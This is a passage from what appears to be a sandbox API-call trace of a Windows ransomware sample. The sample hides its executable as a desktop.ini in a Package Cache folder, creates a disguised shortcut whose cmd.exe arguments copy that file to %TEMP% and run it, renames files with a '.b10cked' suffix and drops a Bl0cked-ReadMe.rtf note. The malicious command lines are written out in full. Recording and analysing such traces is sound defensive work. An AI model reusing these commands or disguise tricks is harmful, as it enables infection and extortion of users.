dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x8a4, dwThreadId=0xff8)) returned 1 [0200.731] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0204.640] CloseHandle (hObject=0x120) returned 1 [0204.640] CloseHandle (hObject=0x1b4) returned 1 [0204.640] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0204.640] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0204.641] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0204.641] GetTickCount () returned 0x39ab8 [0204.641] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=26143000204) returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x51\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x5a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x46\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x65\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x67\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4f\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0204.641] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 
0x65 [0204.641] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0204.641] CharUpperBuffW (in: lpsz="explorer.exe \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\" & type \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9d | out: lpsz="EXPLORER.EXE \"{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\" & TYPE \"{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9d [0204.641] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0204.641] CharUpperBuffW (in: lpsz="explorer.exe \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\" & type \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9e | out: lpsz="EXPLORER.EXE \"{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\" & TYPE \"{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9e [0204.641] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0204.641] CoInitialize (pvReserved=0x0) returned 0x0 [0205.166] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0205.168] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0205.168] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0205.168] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0205.171] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\" & type \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\desktop.ini\" > \"%TEMP%\\xQZmFegO.exe\" && \"%TEMP%\\xQZmFegO.exe\"") returned 0x0 [0205.171] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0205.171] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0205.171] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0205.171] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}.lnk", fRemember=0) returned 0x0 [0205.180] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0205.180] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0205.180] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0205.180] CoUninitialize () [0205.181] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0205.181] ReleaseMutex (hMutex=0xf8) returned 1 [0205.181] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0205.181] ReleaseMutex (hMutex=0xf8) returned 1 [0205.181] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0205.181] ReleaseMutex (hMutex=0xf8) returned 1 [0205.181] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0205.181] ReleaseMutex (hMutex=0xf8) returned 1 [0205.181] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package 
cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0205.181] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.181] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=26197084637) returned 1 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x27e [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x27e [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x27e [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0205.184] ReadFile (in: hFile=0x120, lpBuffer=0x14a8b58, nNumberOfBytesToRead=0x13e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14a8b58*, lpNumberOfBytesRead=0x12ec08*=0x13e, lpOverlapped=0x0) returned 1 [0205.185] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0205.186] WriteFile (in: hFile=0x120, lpBuffer=0x14a8b58*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14a8b58*, lpNumberOfBytesWritten=0x12ec1c*=0x13e, lpOverlapped=0x0) returned 1 [0205.186] SetFilePointer (in: hFile=0x120, lDistanceToMove=-318, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140 [0205.186] ReadFile (in: hFile=0x120, lpBuffer=0x14a8b58, nNumberOfBytesToRead=0x13e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14a8b58*, lpNumberOfBytesRead=0x12ec08*=0x13e, lpOverlapped=0x0) returned 1 [0205.186] SetFilePointer (in: hFile=0x120, lDistanceToMove=-318, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140 [0205.186] 
WriteFile (in: hFile=0x120, lpBuffer=0x14a8b58*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14a8b58*, lpNumberOfBytesWritten=0x12ec1c*=0x13e, lpOverlapped=0x0) returned 1 [0205.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0205.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x131322c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0205.191] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x27e [0205.191] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0205.192] CloseHandle (hObject=0x120) returned 1 [0205.193] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm") returned 0x2d [0205.193] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\") returned 0x24 [0205.194] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, 
bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x928, dwThreadId=0xf78)) returned 1 [0205.277] CloseHandle (hObject=0x1b4) returned 1 [0205.277] CloseHandle (hObject=0x120) returned 1 [0205.277] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\") returned 0x48 [0205.277] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0205.278] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\", cchCount1=72, lpString2="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\", cchCount2=72) returned 3 [0205.278] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\") returned 0x48 [0205.278] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0205.278] CompareStringW (Locale=0x400, dwCmpFlags=0x0, 
lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0205.278] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0205.278] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0205.278] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0205.278] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\") returned 0x24 [0205.278] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0205.278] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0205.279] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf2c, dwThreadId=0x978)) returned 1 [0205.280] CloseHandle (hObject=0x1b4) returned 1 [0205.280] CloseHandle (hObject=0x120) returned 1 [0205.280] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\bl0cked-readme.rtf")) returned 0xffffffff [0205.280] GetLastError () returned 0x2 [0205.280] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0205.285] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package 